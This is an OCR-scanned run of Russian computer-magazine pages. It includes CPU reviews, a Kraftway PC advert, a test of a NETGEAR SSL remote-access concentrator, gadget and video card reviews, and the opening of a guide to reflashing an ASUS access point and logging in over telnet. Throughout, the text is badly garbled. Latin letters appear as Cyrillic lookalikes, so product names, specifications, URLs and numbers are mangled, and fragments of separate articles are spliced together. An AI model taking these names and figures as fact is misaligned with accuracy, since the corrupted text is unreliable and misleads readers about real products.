в том числе и модели на базе Аііепсіаіе. По этой цене ІпТеІСоге 2 0ио Е6300 
уже не так привлекателен для аудитории, подыскивающей бюджетную мо- 
дель. Ранее линейка была представлена всего четырьмя камнями, и тогда 
ІпТеТ Соге 2 Оио смотрелся весьма неплохо. Однако в свете расширения его 
лавры можно передатьтомуже ІпГеІ Соге 2 0ио Е6320. 





Скорость обработки графического изображения во многом зависит и от цен- 
трального процессора. Четырехъядерник от ІпТеІ держит марку и опережает 
своих конкурентов 



дин из самых любимыхтестов оверклокеров не подвергался обновлению 
уже давно. Однако он до сих пор нетеряетсвоей актуальности. Маркетинго- 
ая политика ІпТеІ четко проглядывается в расстановке результатов 
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Геггит 




Іпіеі Соге 2 Рио Е6320 




АМР АІМоп 64 Х2 6000+ 



Ядро: Сопгое 

Технология производства, нм: 65 
Частота ядра, ГГЦ: 1,86 
Количество ядер: 2 
Кэш второго уровня І_2, Кб: 4096 
Коэффициент умножения: 7 
Частота шины, МГц: 1066 
Разъем І-6А775 




Уровень производительности, может быть, ненамного, но поднимается 
благодаря увеличению кэша второго уровня. Преимущество особенно 
заметно при работе с системными утилитами, а также при выполнении 
математических вычислений. Конечно, для разгона процессор Іпіеі Соге 2 
Оио Е6320 не самый удачный вариант, хотя и его предшественник Іпіеі Соге 
2 Оио Е6300 не отличался отзывчивостью при попытке вручную повысить 
производительность. Приятнотакже сознавать, что Іпіеіуровняла цены на 
оба указанных выше решения, и пользователь может выбрать наиболее 
подходящий ему вариантбез лишних затрат. 

Ѳ 

Если математика подопытному экземпляру за счет памяти удавалась 
хорошо, то в решении задач, связанныхс кодированием и обработкой 30- 
приложений, альтернативные варианты с более высокой тактовой частотой 
перед Іпіеі Соге 2 Оио Е6320 имели преимущество. 



Ядро: ѴѴІПСІ50Г 

Технология производства, нм:90 
Частота ядра, ГГц: 3,0 
Количество ядер: 2 
Кэш второго уровня 12, Кб: 2x1024 
Коэффициентумножения: 15 
Частота шины, МГц: 2x800 
Сокет: 5оскеіАМ2 




Самый большой и красивый процессор отАМй несет гордое имя АМй 
АіЫоп 64X2 6000+. Зачем АМй понадобилось снимать маркировку РХ 
изаменятьее классическими обозначениями? Скорее всего, дело в 
традиционных маркетинговыхтрюках. Вполне вероятно, что насждет 
серия четырехъядерников с наименованием РХ, а можетбыть, произво- 
дитель откажется оттакого способа рекламы и все новинки ожидающейся 
серии будут промаркированы в общепринятом стиле. Как бы там ни было, 
процессор АМй АіЫоп 64X2 6000+ жарит в прямом и переносном смысле. 
Во-первых, производительность его на высоте, ну а во-вторых, греется он 
будь здоров! 

0 

С разгонным потенциалом у этого процессора не все так гладко: в зави- 
симости от качества модели пользователь может получить максимум пару 
сотен мегагерц, что и разгоном-то назвать нельзя. 




Пускай этоттестне очень информативен, но для любителей компьютерных 
развлечений он имеет ценность. Стоитобратить внимание на результат, 
показанный АМй АіЫоп 64X2 5000+ ВгізЬапе. Работаетэтот процессор чуть 
лучше аналога на базе ѴѴіпсІзог 



АсіоЬе РИоіозИор С52 



ІпІеІ Соге 2 Оио Е630О 
Іпіеі Соге 2 Рио Е6320 



АІѵТО АІІіІоп 64X2 
6000+ 

Іпіеі Соге 2 0X6700 



эенчмарк призван оценивать всю систему в совокупности, а не отдельные 
е составляющие, так что разрыв между тестируемыми моделями не так 
елик 
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АМР АіЫоп 64 Х2 5200+ 




ІпіеІ Соге 2 0X6700 



Ядро: ѴѴіпсІзог 

Технология производства, нм: 90 
Частота ядра, ГГц: 2,6 
Количество ядер: 2 
Кэш второго уровня І_2, Кб: 2x1024 
Коэффициент умножения: 13 
Частота шины, МГц: 400 
Сокет: Зоскеі АМ2 




Компания АМй заполнила нишу между АМ0 АіНІоп 64X2 5000+ и АМй АіЫоп 
64X2 6000+ различными сочетаниями частоты и размера кэша второго 
уровня. Компанией было выпущено две модели с маркировкой 5200+. Мы 
тестировали решение на базе ядра ѴѴіпсІвогс использованием техпроцесса 
90 нм. Однако в продаже можно найти процессор на основе ядра ВгізЬапе, а 
это 65 нм, большее энергосбережение и, какследствие, высокий разгонный 
потенциал и относительно невысокий уровеньтепловыделения. Как бы там 
ни было, АМ0 расширяетлинейку за счет различных вариаций параметров. 
Процессор АМ0 Аібіоп 64X2 5200+ вобрал в себя достоинства ранее сущес- 
твующих процессоров и имеетполное право на существование. В отличие 
от 90-нм версии, 65-нм модификации имеютуменьшенный кэш второго 
уровня (до 512 Кб на каждое ядро], но зато повышенную на 100 МГц частоту. 

Ѳ 

По сравнению с моделями от I пГеІ, минусов только два — высокоетепловы- 
деление и повидавший виды техпроцесс. 



Ядро: КепЫіеШ 
Технология производства, нм: 65 
Частота ядра, ГГц: 2,66 
Количество ядер: 4 
Кэш второго уровня І_2, Кб: 8192 
Коэффициентумножения: 10 
Частота шины, МГц: 1066 
Разъем І-6А775 




Переход на новыйтехпроцесс позволил I пбеі сократить тепловыделение. 
Хотя четырехъядерный Іпіеі ОиасІ Соге греется куда сильнее горячих моде- 
лей отАМй, это реально действующая модель процессора с учетверенным 
потенциалом. 

0 

Мы уже посвящали этому процессору целую статью с подробным описа- 
нием возможностей. И уже тогда хвастаться было нечем. Дело в том, что 
даже сегодня многие производители программного обеспечения не могут 
предоставить реальную поддержку четырех ядер. Да и есть ли в этом смысл 
сейчас? Да, найдется пара техноманьяков, которые в угоду своей страсти 
приобретуттакой камешек. Но работаеттакой процессор наделе какобыч- 
ный ІпГеІ Соге 2 Оио Е6700. Остается только ждать грамотной реализации 
ПО и повсеместного распространения процессоров с четырьмя ядрами. 



щ ВЫВОДЫ 

Итак, после проведенного тестирования можно сделать некоторые вы- 
воды и наградить самые интересные решения. Ксожалению, процессор 
I пбеі Соге 2 0X6700 может считаться хорошим выбором только лишь с 
точки зрения дальнейших перспектив. Соотношение цена/производи- 
тельность, ксожалению, далеко от I пГеІ Соге 2 Рио Е6700. Пусть он также 



недешев, но в данном случае кандидатов на это место нетакуж и много 
— именно ему мы отдали «Выбор редакции». Если хочется помощнее, но 
душ ит жаба, советуем уделить внимание АМО АіЫоп 64X2 5000+ ВгізЬапе 
(«Лучшая покупка»). Этотпроцессор с низким уровнем энергопотребле- 
ния работает с той же эффективностью, что и стандартный вариант, но 
имеет высокий разгонный потенциал.^ 



РЕДАКЦИЯ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИИ 1Л.ТКА 
ЕІ-ЕСТК0ШС5 (Т. (495) 775-7566, ѴѴѴт.ЦІ-ТКАСОМР.КЦ ). А ТАКЖЕ РОССИЙСКИМ ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ АМР И ІИТЕІ_. 
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КгаІЧѵѵау рекомендует подлинную 
ѴѴіпсіоѵѵб Ѵізіа® Ноте Ргетіит 



кгаПмау 

ТЕХНОЛОГИИ ДЛЯ ЛЮДЕЙ 




Супермощная игровая станция КгаТіѵѵау Ісіеа 

на базе двухъядерного процессора ІпіеІ® Соге™ 2 Эио 



КгаЛѵѵау Ісіеа - это воплощенная в реальность мечта игромана о надежной платформе, 
способной обеспечить невиданное ранее быстродействие и потрясающую графику для самых 
требовательных к ресурсам игр. 

Сбалансированная конфигурация, созданная на базе лучших на сегодняшний день 
компонентов — мощнейшего двухъядерного процессора ІпТеІ® Соге™ 2 Оио Е6320, 
русифицированной подлинной ОС МісгозоД® ѴѴіпсіоѵѵб ѴізГа® Ноте Ргетіит, оперативной 
памяти большого объема, видеокарты последнего поколения N VI 01 А ОеРогсе 8600СТ5 — 
превращает КгаЛѵѵау Ісіеа в компьютер с большим потенциалом, лишенный «узких» мест. 

Забудьте о тормозах - их больше нет! 

Сделано с любовью. С любовью к игре. 



/. ... Ч 



Узнайте больше о преимуществах компьютера КгаЛѵѵау Ісіеа по телефону бесплатной консультационной 
линии 8 - 800 - 200 - 19-91 или на сайте ѴѴѴѴѴѴ.кга^ІѴѴау.Ш Приобрести компьютеры КгаЛѵѵау Ісіеа вы 
можете в магазинах федеральных розничных сетей или у партнеров компании в регионах. 







Соге Іпзісіе, ІпіеІ, ІпіеІ Іодо, ІгтГеІ Соге, Іпіеі ІпБІсІе, ІгйеІ ІПБІсІе Ьодо являются товарными знаками, либо зарегистрированными товарными знаками, права на которые 
принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. Товар сертифицирован. Комплектацию уточняйте у продавца. 



Теггигм 






КИРИЛЛ АВРОРИН ИГОРЬ ФЕДЮКИН 

Тестирование 

55І_-концентратора 

МЕТ0ЕАР55І 312 



НЕДОРОГОЙ И НАДЕЖНЫЙ УДАЛЕННЫЙ ДОСТУП К КОРПОРАТИВНОМ СЕТИ 




Многим современным корпоративным сетям не хватает удобного решения для постоянно- 
го удаленного доступа к локальной сети и ее ресурсам. Кроме того, на первой стадии по- 
добная функция нужна всего нескольким сотрудникам, в связи с чем многие фирмы счи- 
тают нерезонным производить дорогостоящие закупки соответствующего оборудования. 
С технологической точки зрения есть масса способов решения этой проблемы, но наиболее 
оптимальным по соотношению цена/безопасность/простота в установке и настройке явля- 
ется доступ с использованием ѴРІМ-тоннеля. Причем здесь предпочтительнее использова- 
ние протокола ЗЗй, так как он в состоянии обеспечить быстрое и защищенное подключение 
мобильных клиентов. Учитывая, что в последнее время рынок мобильных устройств для 
удаленной офисной работы заметно расширился, проектировать систему дистанционного 
доступа к корпоративной сети без учета этого типа устройств не имеет никакого смысла. 
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Осталась лишь небольшая финансовая проблема — многие предла- 
гаемые на сегодняшний день современные 55І_-кон центраторы стоят 
приличных денег. Поэтому нам показалось интересным провести тест, 
можно сказать, одного из первых бюджетных решений в этом классе 
-ЫЕТеЕАР55І_312. 

Технические характеристики: 

Интерфейсы: 2х І_АЫ (Ю-45) ю/100 Мбит/сек 

Виды шифрования: 0Е5 Р ЗРЕ5, МР5, АКС4, АЕ5 (ЕСВ, СВСДСВС, СИТК) 
128/256 бит 

Безопасность: МР5, 5НА-1, МАС-М05/5НА-1, НМАС-МР5/5НА-1 
Поддержка сертификатов: К5А, ОіНіе-НеІІтап, БеІІ 
Авторизация: ВАОШБ, Асііѵе Оігесіогу, І_йАР 



^ ТЕХНОЛОГИИ 

Сердцем бюджетного концентратора является типичная схема, в кото- 
рой все основные компоненты распаяны на одном кристалле. В качестве 
центрального процессора выступает модель Саѵіит ІМІТПОХ Бобо 
СЫ220-200В6276 стактовой частотой 200 МГц. На плате интегрировано 
три отдельных контроллера Раз! ЕіЬегпеі, но в этой модели используются 
только два из них. Кроме сетевых адаптеров имеются полноценные порты 
РСІ/ІІАРТ/ОРІОв, а также аппаратный ускорительтоннелей по протоко- 
лам ІР5ес/55І_. Официально заявленная скорость работы этихтоннелей 
— 125 Мбит/с для ІР5ес и 25 Мбит/с для 55І_. 

Разумеется, инженеры не обошли вниманием память: на плате рас- 
паяны два чипа СМ05 5БРАМ производства Вагпзипд с маркировкой 
К4551 1 6320-1)075. Объем каждого из них — 64 Мб. Тактовая частота 
вполне стандартна — 1 33 МГц при СА5, равном 3,0. Для системных нужд 
имеется и флеш-память МХ29І_ Ѵ640ВТТС-900 общим объемом 16 Мб. 
Весьма неплохо реализованы основные функциональные возможности 
концентратора. Процесс авторизации максимально прости понятен: 
база пользователей хранится либо в ресурсах самого концентратора, 
либо на внешнем РА0ІІ)5-сервере, Асбѵе Бігесіогу или І_0АН В качестве 
программного интерфейса выступаетлюбой веб-браузер с поддержкой 
М іеговой АсбѵеХ. Соответственно, никаких проблем авторизации возник- 
нуть не должно, какой бы тип мобильного устройства не использовался. 
Кчислу базовых функций концентратора, доступных после авторизации, 
относится управление удаленным рабочим столом, доступ к сетевому ок- 
ружению ѴѴіп б оѵѵв 5МВ, терминальным службам ѴѴіпсіоѵѵб (СЖісе со всеми 
его приложениями), возможность захода на ГТР-сервер, а также управле- 
ние посредством Теіпеі и 55Н. Всех этих средств вполне достаточно для 
полноценного использования сети, мобильной работы, обмена любыми 
видами данных (за небольшим исключением), причем на достаточно 
высокой скорости при обеспечении должного уровня безопасности. При 
этом нет необходимости устанавливать ѴРЫ-туннель, достаточно лишь 
встроенных в ЫЕТ6ЕР 5І_31 2 средств. Единственный его визуальный 
недостаток — отсутствие поддержки русского языка, что приводит к некор- 
ректному отображению файлов с названиями на кириллице. Впрочем, 
вероятно, уже есть необходимые прошивки и обновленные программные 
средства, либо эта проблема будет решена в ближайшем будущем. 
Непосредственно с активацией 55І_-тоннеля посредством АсІіѵеХ созда- 
ется виртуальное соединение. Есть возможность выбора перенаправле- 
ния всех портов или нескольких избранных. 

^ МЕТОДИКА ТЕСТИРОВАНИЯ 

В первую очередь мы проверяли реальную скорость работы созданного 
ѴРЫ-тоннеля при помощи программного пакета ЫеШ СЬагіоІ и скрипта 




ТЬгоидЬриГ передавая таким образом пакеты максимально возможного 
размера. На каждой из двух рабочих машин устанавливались епсіроіпі- 
утилиты, а после этого в ЫеШ СЬагіоІ запускался скрипт генерации 
трафика. Версия рабочей прошивки — 1.4.19. 

Далее мы создали два сегмента сети (соответственно ѴѴАЫ и БАМ), соеди- 
ненных при помощи маршрутизатора О-Ыпк ОРЕ-800. Одна из машин, к 
которой был подключен ЫЕТ6ЕАР 55І_31 2 и на которой была запущена 
утилита ЫеГЮ СЬагіоІ, помещалась в БАЫ-сегмент, а вторая система 
находилась в пределах ѴѴАЫ-сети. Пакеты направлялись на 443-й порт. 

В процессе мы уточнили реальную скорость работы, которая составила 
практически 1 00 Мбит/с, поэтому маршрутизатор ни в коем случае нельзя 
причислить кслабым звеньям созданной сети. 

При попытке передачи пакетов из внешней сети во внутреннюю (ѴѴАЫ 
І_АЫ) скорость составила порядка 6,07 Мбит/с. Концентратор способен 
одновременно контролировать 25тоннелей, чего должно вполне хватить 
для комфортной работы: для стандартного обмена документами, неболь- 
шими файлами и сообщениями. Достаточно этого будет и для обычного 
удаленного администрирования. Если подсчитать, то при одновремен- 
ной работе 25 пользователей получается примерно 256 Кбит/с на каждо- 
го, однако нагрузка обычно распределяется неравномерно. Разумеется, 
следует помнить, что это решение с возможностью одновременной 
работы только 25 пользователей (целых 25 пользователей?!) подойдет 
лишь для компаний среднего размера. 

г ВЫВОДЫ 

Что ж, проведя ряд нехитрых, но вполне достаточных тестов, мы вправе 
заявить, что дебют экономичного концентратора для удаленного 
доступа пользователей удался. ЫЕТѲЕАР использовала простую, но 
вполне оправдывающую себя схему компоновки «железной» части 
устройства, снабдила его неплохим (но и не идеальным) комплектом 
программного обеспечения, в результате чего получилось надежное, 
весьма функциональное и лишенное серьезных проблем решение. Мы 
рекомендуем его для небольших компаний, впервые столкнувшихся с 
необходимостью обеспечения своих работников мобильным доступом 
к ресурсам внутренней сети. Судя по всему, в ближайшем будущем с 
этой актуальной проблемой придется столкнуться все большему числу 
ІТ-директоров. т 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКОМУ 
ПРЕДСТАВИТЕЛЬСТВУ КОМПАНИИ ЫЕТ6ЕАК. 
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4 девайса 




Месіиза 5.1 
Ргобатег ЕсШіоп 

«Звук вокруг» для эгоиста 



$200 




5опу ОРР-РР70 

Производительный сублимаци- 
онный фотопринтер 



$200 



Технические характеристики: 

Подключение: тіпі-іаск, СІ5В 

Количество каналов: 5*1 

Количество динамиков: 4 на каждое ухо 

Наличие микрофона: есть 




1. Большие наушники оченьудобно сидяти согреюттвоиуши холодными 
зимними днями/ночами/вечерами. 

2. Ты не ограничен в подключении: можешь использовать тіпі-іаск или 
115В. 

3. В каждом ухе установлено по 4 динамика для создания «звука вокруг». 

4. Микрофон может быть снят для простого прослушивания музыки и уста- 
новлен при необходимости — для подключения используется 
разъем-тюльпан. 

5. Микрофон поворотный и установлен на гибкой ножке — его можно 
настроить так, чтобы тебе было удобно. 

6 . На пульте управления отдельно регулируется громкость для каждого из 
каналов в случае подключения по 1)5В. 

7. Чувствительность микрофона достаточно высока для комфортного 
общения. 

Ѳ 

1. Амбушюры приятны на ощупь, но не глушатвнешние звуки — сильно 
отвлекает окружающий звуковой фон. 

2. Кнопки отключения микрофона нет, отключить его можно, только выдер- 
нув шнур. 

3. Блокуправления выполнен из не очень качественного пластика с 
заусенцами. 



Техническиехарактеристики: 

Поддержка карт: МетогуЗііск, 5й и СотрасіРІазЬ 
Интерфейсы: 115В, ВІиеІооІН (при наличии адаптера ОРРА-ВТі) 

Диагональэкрана: 2,5" 

Цветовое разрешение: 25буровнейхЗЦвета;1б,7млн цветов 
Разрешение: 300x300 сірі 

Размер отпечатков: 4x6" (10x15 см, размер открытки) 




1. Компактный принтер можно легко носить с собой и подключать где 
угодно. 

2. Автономность работы обеспечивается наличием картридера и поддерж- 
кой подключения аппаратов с функцией РісШгібде. 

3. При желании можешь печатать фотографии прямо стелефона, переда- 
вая их на принтер по ВІиеІооШ (необходим адаптер ОРРА-ВТІ ). 

4. Функции обработки изображения дают возможность немного подредак- 
тировать фотографию или сразу создать с ней календарик. 

5. Поддержка скоростной печати гарантирует выход готового снимка через 
45 секунд после нажатия кнопки РгіпС 

6 . Сублимационное нанесение краски плюс дополнительный слой защит- 
ного покрытия — фотография проходит 4 стадии при печати. 

7. Хорошее качество снимка обеспечено — высокая четкость и насыщен- 
ные цвета. 

0 

1. Поддерживается только специальная бумага. 

2. Стоимость отпечатка по-прежнему высока — около 8-10 рублей за 
снимок. 

3. Стоимость самого принтера сравнима со струйными моделями, обеспе- 
чивающими больший форматпечати. 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИИ «БЮРОКРАТ» 
(Т. (495) 745-551 1 , ѴѴѴѴѴѴ.ВУРО. РУ), А ТАКЖЕ РОССИЙСКИМ ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ М5І И 50ЫУ. 
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51 Расіеоп НЮ 
2900 ХТ 

Видеоускоритель 
для любителей поганать 



$550 



Технические характеристики: 

Наименование процессора: АТІ КбОО 
Количество потоковых процессоров: 320 шт. 

Количество текстурных блоков: 16 шт. 

Частота ядра: 740 МГц 
Частота памяти: 825 МГц 
Объем памяти, тип: 512 МббйОКЗ 

Шина памяти : двунаправленная Ріпд Виз, 512 бит в каждую сторону 

Скорость обработки пикселей: 47,5 млрд пикселей в секунду 
Скорость обработки полигонов: 740 млн полигонов в секунду 
Количествотранзисторов: 700 млн 
Техпроцесс: 80 нм 

Тестовый стенд: 

Процессор: АМй А1Ы.ОП 64X2 5000+ 

Системная плата: Азиз М2Ы32 5І_І Оеіихе 
Память: 2х 1024 Мб, Кіпдзіоп ООП2-800 ЗОНАМ 
Винчестер: 80 Гб, Зеадаіе Ваггасиба 7200 грт, ЮЕ 
Блок питания: 450 Вт, Ріозіоп 

Результаты тестирования: 

ЗОМагк'05: 1 5325 Магкз 

ЗОМагк‘06: 11512 Магкз 

Оиаке 4, 1 600x1200, 4хАА, 1 6хАР: 96 РР5 

РЕАН, 1 600x1 200, 4хАА, 1 6хАР: 61 РР5 

НаІМЛе 2, 1600x1 200, 4хАА, ІбхАР: 101 РР5 




ОІасіаІТесИ Ідіоо 7320 ТС 

Неплохой кулер за неплохие деньги 



Технические характеристики: 

Питание вентилятора: 12 В 

Скорость вращения: 1800-3200 об/мин (±10%) 

Поток воздуха: 21-41 СРМ (±10%) 

Шум: 19-31 дБ 

Размеры вентилятора: 80x80x25 мм 
Разъем питания: 3-контактный 
Материал радиатора: алюминий 
Крепление: пружинный зажим 
Установочные размеры: 86x84x71 мм 
Вес: 385 г 

Тестовый стенд: 

Процессоры: I пГеІ Соге 2 Био Е6700 
Материнская плата: М5І 975Х Ріаііпит 
Видеокарта: А5 115 ЕАХ1900ХТХ, 512 Мб 
Память: 2х 512 Мб, Кіпдзіоп НурегХ ООР2-800 
Винчестер: 80 Гб, 5еадаІе Ваггасиба 7200 грт 
Блок питания: 450 Вт, Ріозіоп 




1. Видеокарта М5І Рабеоп ЕЮ 2900 ХТ производит положительное впечат- 
ление. Плата отличается нетолько высоким уровнем производительности, 
но и обширной функциональностью, не говоря уже о достойном внешнем 
виде и приличной комплектации. Стоит отметить, что М5І Рабеоп ЕЮ 2900 ХТ 

— это не флагманская модель. Также планируется выпуск модели АТІ 
Рабеоп ЕЮ 2900ХТХ, которая станетсамой производительной видеокартой 
во всей линейке. 

2 . Внешне новинка напоминает АТІ Рабеоп XI 950 ХТХ с той лишь разницей, 
что длина увеличена где-то на 36 мм. В маленький корпус такой адаптер 
точно не поместится! 

3. Плата оборудована двумя разъемами 0І_ йѴІ, не говоря уже о тради- 
ционном выходе Ѵібео-Оиі. К одному из разъемов йѴІ можно подключить 
специальный переходник и получить возможность работы с ЕЮ-телевизо- 
рами и мониторами. 

4 . Отдельного внимания, как всегда, заслуживает система охлаждения. 

На медном основании расположены тонкие ребра, которые соединены с 
подошвой радиатора посредством тепловыхтрубок. 

5 . Охлаждение платы М5І Рабеоп ЕЮ 2900 ХТ выполнено в двухслотовом 
варианте, то есть турбина работает на выдув из корпуса. Вентилятор, 
установленный в этом случае, относительно тихий. По крайней мере шум не 
вызывает дискомфорта. 

0 

1. Если стехническойточки зренияу нас не возникло вопросов крассмат- 
риваемому продукту, то единственное, что может помешать его покупке, 

— это цена. Ктакой карте потребуется мощный блок питания, что тоже не 
лучшим образом отразится натолщинетвоего кошелька. Платы из серии 
АТІ ЕЮ2000 любят плотно кушать. 



Результаты тестирования: 

После 30 мин работы (закрытый стенд). Работаеттолько ОС: 42°С. 
После 30 мин работы (закрытый стенд). ЕІагрузка 5&М 100%: 74°С. 
После 30 мин работы (открытый стенд). Работаеттолько ОС: 40°С. 
После 30 мин работы (открытый стенд). ЕІагрузка 5&М 100%: 71 °С. 




1. Поддерживаются процессоры с ТОР до 104 Вт. 

2 . Размеры устройства не превышаютбоксовые габариты. Такое устройс- 
тво можно приобретать вместе с ОЕМ-процессором для установки либо в 
компактные корпуса, либо в бюджетные системы. Отдельное внимание на 
эту модель должны обратить те, для кого слово «разгон» не связано с чем-то 
сверхъестественным. 

3. Как преемник кулеров серии Ідіоо 7310, серия Ідіоо 7320 спроектирована 
на основе алюминиевого радиатора и весит385 г. 

4 . Крепление осуществляется посредством пропущенной сквозь радиа- 
тор пластины, которая фиксируется с помощью зажима на решетке вокруг 
процессорного сокета. 

5 . Согласнотехническим характеристикам, скорость вращения вентиля- 
тора на максимуме равна 3200 об/мин. При средней нагрузке этотпараметр 
оказался несколько ниже — порядка 2500 об/мин. Поэтому и шум меньше. 

6 . На эстетику рассчитывать не стоит — акцент при изготовлении уст- 
ройства делался на практичность. Интереснотакже, что кулер можетбыть 
установлен на разъемы 754, 939, 940 АМ2 и 5оске{ Г. 

0 

1. Несмотря на привлекательную цену, производительность этого уст- 
ройства оставляет желать лучшего. Об этом свидетельствуют результаты 
тестирования. 
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КАК ПОДНЯТЬ МНОГОФУНКЦИОНАЛЬНЫМ СЕРВЕР 



НА ОБЫЧНОЙ АССЕ55 РОІИТ 



Что ты думаешь насчет того, чтобы взять самую обыкновенную точку доступа и сделать 
из нее сервер? Выкинуть, наконец, тот старый хлам, что гудит и пылится в углу, а на 
видное место поставить небольшую симпатичную коробочку. Провести несколько часов 
за настройкой и потом смело спорить с друзьями, утверждая, что на ней одновременно 
крутятся веб-сервер с поддержкой скриптов, файловое хранилище гигабайт так на 500, 
ВпТоггеШ-клиент, сутками качающий варез, ІКС-бот — да что угодно еще! Смотрю, ты 
уже и сам готов поспорить? А вот и зря :). 



е секрет, что любой аппаратный роутер, точка доступа или 
тотже самый Ай5І_-модем — это небольшой компьютер. Те 
самые коробочки разных цветов и форм, которые в изобилии 
представлены на прилавках магазинов, на самом деле имеют 
процессор, оперативную и флеш-память и работают под управлением 
операционной системы. Причем не какой-то специальной ОС, а как пра- 
вило, самой что ни на есть обычной операционки, которая установлена на 
миллионах компьютеров по всему миру, — Ыпих’а! Так что же нам мешает, 
чуть покопавшись, залезть в дебри системы и чуть-чуть там повеселиться? 
Да ничего! Вот этим и займемся — проведем эксперимент! 

г ПОДОПЫТНЫЙ ОБРАЗЕЦ 

В качестве подопытного образца мы взял и точку доступа А5Б5 ѴѴІ_500дР. 
Бедняга уже больше года стояла у меня на полке и занималасьтолькотем, 
что раздавала инетна одно единственное беспроводное устройство в 
квартире — мой ноутбук :). Отличный случай разобраться, за что же я в свое 
время выложил $100, тем более что девайс как нельзя лучше подходил для 
экспериментов за счет поддержки ИЗВ-устройств, позволяющей воплотить 
наши даже самые извращенные фантазии. 

Расковыряв корпус, я заглянул внутрь. Центральный процессор, микро- 
схемы оперативной и флеш-памяти находятся под алюминиевым экраном. 
В качестве СРІ) используется чип от Вгоасісот ВСМ4704, работающий на 
вполне достаточной частоте 266 МГц. Рядом установлены две микросхемы 
памяти Нупіх НѴ501І281622ЕТР по 16 Мб каждая. Флеш-память объемом 
8 Мб представляет собой чип Брапзіоп 5296Б064М. Воттут-то и хранится 
ОС, настройки, а также всевозможные программы. Кстати говоря, 8 Мб 
— это чрезвычайно мало и явно недостаточно для установки даже несколь- 
ких программ, поэтому контроллер 115В 2.0, позволяющий помимо принтера 
и веб-камеры, подключить внешний РЮО или флешку, нам очень кстати. 
Интегрированный свитч построен на процессоре Вгоасісот ВСМ5325 и 
является управляемым (10/100 Мбит/с) с возможностью создания ѴБАЫ'ов 
и управления очередями 0о5. Модуль беспроводной связи установлен 



в тіпіРСІ-слоти представляет собой микросхему ѴѴБ-1 206 Ѵ2, также 
построенную на чипе Вгоасісот. Вотоб этом я и говорил: самый обычный 
компьютер! 

Тут надо сказать, что на месте ѴѴІ_500дР могло быть все что угодно: анало- 
гичные гаджеты от І_іпк5уз (например, нашумевший ѴѴРТ540), 0-1_іпк и 
прочих производителей. Все они работают под управлением модифици- 
рованного Ыпих’а — везде разного по настройке, но одинакового по сути. 
Правда, в стандартной поставке (прошивке)такой пингвин обычно ни на 
что не годится. Производители и разработчики прошивок намеренно силь- 
но ограничиваютего функциональность. Еще бы — любой дополнительный 
модуль может привести к нестабильности работы системы, что для любого, 
и особенно сетевого, оборудования недопустимо! Поэтому делаем вывод: 
операционную систему внутри «коробочки» для проведения эксперимен- 
тов надо поменять! 

Существует специальный проект, который называется ОрепѴѴгІ ( бМр:// 
орепѵѵгЕогд І и основан на базе исходного кода, опубликованного компани- 
ей ЫпкЗуз. Это бесплатный Ыпих-дистрибутив, совместимый с огромным 
количеством разнообразных аппаратных роутеров, который позволяет 
реализовать функциональность несоизмеримо большую, чем «родные» 
прошивки. Если на устройство можно залить ОрепѴѴН, это уже почти 
гарантированно означает, что оно способно на большее, нежели заявля- 
ет производитель. Поэтому перед покупкой девайса для экспериментов 
советую тебе посмотреть таблицу совместимости — Ьб:р:/Лоб.орепѵѵгЕогд . 
Наша точка — ѴѴБбООдР — в этой таблице, разумеется, есть. Но! Заливать 
ОрепѴѴгІ мы в нее не будем! Дело в том, что специально для этой модели 
нашим соотечественником (неким Оіед’ом) создана изумительная бгтѵѵаге, 
от которой пользователи просто без ума. Вот ее-то и я задействовал. 

0 ЗАЛИВАЕМ ПРОШИВКУ 

Залить новую прошивку можно двумя путями: через веб-интерфейс или 
через утилиту восстановления отА5У5. По большому счету разницы ника- 
кой нет, поэтому я, взяв инструкцию, воспользовался первым вариантом. 
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|Обновить прошивку проще всего через веб-интерфейс 



|Мощныевнутренности «коробочки» 



Последняя версия бгтѵѵаге всегда доступна на сайте Ы:1:р://о Іеа.ѵѵІбООа.іпбо 
(на момент публикации — \/ѴІ_500др-1 .9.2.7. 7д). Перед установкой прошивки 
рекомендуется отсоединить патч- корд от ѴѴАЫ- порта (активность из внеш- 
ней сети не должна влиять на процесс) и кабели от ІІЭВ-портов. Далее я 
перегрузил АР через веб-интерфейс и перешел на страницу администриро- 
вания: «Зузіет Зеіир -> Еігтѵѵаге ІІрдгасІе», где оставалось только выбрать 
файл с прошивкой. Через 2 минуты роутер перезагрузился, и, судя по всему, 
все было хорошо. 

Надо сказать, что убить точку от А51І5 довольно сложно. Даже 
если в момент перешивки выключилось питание или перешивка 
не удалась, ее можно восстановить с помощью стандартной 
программы гезсиег.ехе. Через минуту я нажал на кнопку РЕ5ЕТ, 
чтобы сбросить все настройки и установить им дефолтные 
значения на случай, если моя оригинальная прошивка слишком ста- 
рая. Очень важный момент: минуту-другую перед нажатием 
ВЕ5ЕТ нужно выждать обязательно — это время требуется для 
загрузки роутера. 

0 РАЗ-ДВА-ТРИ, ПРОВЕРКА! 

Управлять работой «коробочки» через веб-интерфейс довольно просто 
и удобно, но для экспериментов его явно маловато. Поэтому я почти 
сразу попробовал подсоединиться к устройству через Іеіпеі, набрав 
через «Пуск -> Выполнить» команду Іеіпеі 1 92.1 68.1 .1 . В окне тут же 
появилось приглашение для входа в систему и после ввода стандарт- 
ного логина/пароля (ас! т іп/асі гп і п) , я оказался в знакомой никсовой 
консоли. 

Последние сомнения по поводутого, какая система использовалась в 
качестве базовой, отпали после ввода команды ипате -а: 

Ьіпих (попе) 2.4.20 #75 Ргі Арг б 00:12:23 МЗБ 2007 
тірз ипкпоѵт 

Это был Линукс! На ядре 2.4.x. Я поигрался со стандартными командами Іор, 
рз, сК, ігее и стал заморачиваться дальше. 

Б НАСТРОЙКА БЕЗОПАСНОГО СОЕДИНЕНИЯ ПО 55Н 

Поддержка протокола Іеіпеі осталась для упрощения процедуры настрой- 
ки, но использовать такой протокол постоянно не хотелось, поскольку 
данные летели по сети в открытом виде. Было решено не откладывать этот 
